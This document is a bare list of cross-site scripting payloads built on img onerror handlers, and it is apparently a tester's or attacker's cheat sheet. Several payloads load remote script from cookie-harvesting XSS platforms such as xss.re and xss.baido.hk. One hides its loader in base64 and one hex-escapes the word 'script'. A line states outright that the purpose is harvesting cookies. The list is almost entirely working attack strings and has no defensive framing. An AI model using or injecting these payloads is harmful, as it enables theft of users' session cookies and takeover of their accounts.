<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use a platform to harvest cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img>
"><img src=x onerror="with(document)body.appendChild(createElement('script')).src='//xss.re/974'"></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src='0' onerror=with(document)body.appendChild(createElement('script')).src='/xx'>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript('//xss.tw/4091'))>
<img src=N onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)>
<img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>